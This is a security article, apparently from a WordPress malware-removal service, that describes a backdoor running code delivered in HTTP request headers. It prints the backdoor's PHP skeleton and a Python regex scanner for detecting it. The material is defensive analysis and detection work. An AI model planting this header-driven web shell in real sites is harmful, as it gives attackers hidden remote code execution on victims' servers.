This article explains a type of backdoor that receives the main body of the malware code through the request headers (read into a variable named $_HEADERS), which has been increasingly detected in recent years.


A backdoor that receives the malware body code via HEADER instead of POST or GET

This backdoor is new in that the malware itself is delivered to the server remotely, embedded in the header part of the HTTP request (HEADER), instead of through conventional POST or GET requests. Although it is a new type of backdoor, it is currently very popular.

By exploiting a vulnerability in WordPress, or after administrator privileges have been taken over, attackers generate a number of backdoors containing the following code in WordPress folders and plugin/theme folders, in files named with generic words.

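// "random word(s)" stands for the random names that appear in real samples
$_HEADERS = getallheaders();
if (isset($_HEADERS['random word'])) {
    // header values are used as function names and as their arguments
    $random_word = $_HEADERS['random words']('', $_HEADERS['random words']($_HEADERS['random words']));
    $random_word();
}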

The code is designed so that create_function (a PHP function that creates a function, similar to eval) can be executed remotely using the data stored under randomly named entries of the header array, without using POST or GET requests. This makes the code very difficult to detect as a backdoor.

Detection and Removal

You can detect and remove this type of backdoor by using the latest malware detection patterns of the following free plugin:

WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]

We hope you will give it a try.
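
For a manual check of a site's files, the following added example (not part of the plugin or of the original article) flags PHP source in which an element of the array returned by getallheaders() is called as a function, which is the pattern shown above. The sample strings are constructed, the function names are hypothetical, and apache_request_headers() is included as an assumption because getallheaders() is its alias.

```python
import re
import sys
from pathlib import Path

# Constructed sample: the backdoor shape shown above, placeholders kept.
SAMPLE_BACKDOOR = """<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['random word'])) {
    $random_word = $_HEADERS['random words']('', $_HEADERS['random words']($_HEADERS['random words']));
    $random_word();
}
"""

# Constructed benign sample: a header is read but never called.
SAMPLE_BENIGN = """<?php
$headers = getallheaders();
$token = isset($headers['Authorization']) ? $headers['Authorization'] : '';
check_token($token);
"""

# Variables that receive the request-header array.
ASSIGN = re.compile(
    r"\$(\w+)\s*=\s*(?:getallheaders|apache_request_headers)\s*\(\s*\)", re.I)

def find_header_callables(php_source):
    """Return [(line_no, line)] where a header value is invoked as a function."""
    header_vars = set(ASSIGN.findall(php_source))
    if not header_vars:
        return []
    names = "|".join(re.escape(v) for v in header_vars)
    # Matches $var['key'](  i.e. an array element used as a function name.
    call = re.compile(rf"\$(?:{names})\s*\[[^\]]*\]\s*\(")
    return [(no, line.strip())
            for no, line in enumerate(php_source.splitlines(), 1)
            if call.search(line)]

def scan_tree(root):
    """Scan every .php file under root and return {path: hits}."""
    results = {}
    for path in Path(root).rglob("*.php"):
        hits = find_header_callables(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(target).items():
        for no, line in hits:
            print(f"{path}:{no}: {line}")
```

Run it with the WordPress root as the only argument; each reported line is a candidate to review by hand, since this is a heuristic for one code shape and not a replacement for a full malware scan.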

WordPress Doctor can also perform malware and backdoor scanning and removal on your behalf. If you find it difficult to do it by yourself, please feel free to send us your inquiries.